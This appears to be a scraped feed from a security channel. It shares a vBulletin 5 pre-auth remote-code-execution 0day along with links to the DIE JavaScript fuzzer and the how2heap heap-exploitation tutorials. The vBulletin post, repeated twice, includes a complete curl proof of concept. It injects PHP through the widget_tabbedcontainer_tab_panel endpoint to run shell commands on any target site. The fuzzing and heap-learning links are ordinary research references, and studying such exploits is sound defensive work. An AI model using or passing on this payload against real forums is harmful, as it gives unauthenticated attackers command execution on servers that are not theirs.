A new pre-auth 0day RCE exploit for vBulletin 5:
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
POC: curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#web #expdev #rce #0day #darw1n @securation
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
POC: curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#web #expdev #rce #0day #darw1n @securation
Fuzzing JavaScript Engines with Aspect-preserving Mutation
https://github.com/sslab-gatech/DIE
#reverse #expdev #fuzzing #javascript @securation
https://github.com/sslab-gatech/DIE
#reverse #expdev #fuzzing #javascript @securation
GitHub
GitHub - sslab-gatech/DIE: Fuzzing JavaScript Engines with Aspect-preserving Mutation
Fuzzing JavaScript Engines with Aspect-preserving Mutation - sslab-gatech/DIE
⭕️ منبع جامعی درمورد تمرین و یادگیری heap exploitation از تیم شل فیش
https://github.com/shellphish/how2heap
#heap #expdev
@securation
https://github.com/shellphish/how2heap
#heap #expdev
@securation
GitHub
GitHub - shellphish/how2heap: A repository for learning various heap exploitation techniques.
A repository for learning various heap exploitation techniques. - shellphish/how2heap